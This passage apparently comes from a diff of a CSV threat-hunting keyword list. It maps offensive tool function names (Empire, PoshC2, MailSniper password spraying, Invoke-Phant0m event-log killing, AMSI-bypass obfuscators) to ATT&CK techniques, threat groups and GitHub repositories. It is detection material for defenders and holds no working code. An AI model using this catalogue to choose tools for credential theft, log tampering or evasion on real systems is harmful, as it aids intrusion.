T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1148","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Obfuscation -ScriptPath *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Invoke-Obfuscation*","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059 - T1140","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","1","N/A","N/A","10","3290","733","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z" +"*Invoke-Obfuscation.psd1*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*Invoke-OpenInboxFinder*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-OpenOWAMailboxInBrowser*","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","5","440","66","2023-09-26T18:45:16Z","2021-07-08T02:28:12Z" +"*Invoke-OxidResolver*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Oxidresolver*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-OxidResolver*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-P0wnedshell*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-P0wnedshellx86*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-PacketKnock*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Paranoia*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-Paranoia.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Paranoia*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1146","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PasswordSpray*","offensive_tool_keyword","MailSniper","Invoke-PasswordSpray* will attempt to connect to an * portal and perform a password spraying attack using a userlist and a single password.","T1114 T1550 T1555 T1212 T1558 T1110","N/A","N/A","N/A","Exploitation tools","https://github.com/dafthack/MailSniper","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayEAS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayEWS*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayGmail*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PasswordSprayOWA*","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2626","554","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" +"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PatchDll*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Phant0m*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Phant0m*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" "*Invoke-Phant0m*","offensive_tool_keyword","Invoke-Phant0m","This script walks thread stacks of Event Log Service process (spesific svchost.exe) and identify Event Log Threads to kill Event Log Service Threads. So the system will not be able to collect logs and at the same time the Event Log Service will appear to be running. I have made this script for two reasons. First. This script will help to Red Teams and Penetration Testers. Second. I want to learn Powershell and Low-Level things on Powershell for cyber security field","T1059 - T1086 - T1216","TA0007 - TA0008","N/A","N/A","Defense Evasion","https://github.com/hlldz/Invoke-Phant0m","1","0","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" @@ -12119,340 +12274,341 @@ "*Invoke-Phant0m.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Invoke-Phant0m.ps1*","offensive_tool_keyword","cobaltstrike","Aggressor script to integrate Phant0m with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/p292/Phant0m_cobaltstrike","1","1","N/A","10","10","26","13","2017-06-08T06:42:18Z","2017-06-08T06:39:07Z" "*Invoke-Phant0m.ps1*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" -"*invoke-pipekat *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*invoke-pipekat *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Invoke-Piper*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "*Invoke-PiperClient*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "*Invoke-PiperServer*","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral movement","https://github.com/p3nt4/Invoke-Piper","1","1","N/A","N/A","3","284","60","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z" "*Invoke-PipeShell.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-PortBind*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-PortBind*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-Portscan*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Invoke-PortScan*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1187","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" -"*Invoke-Portscan*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - 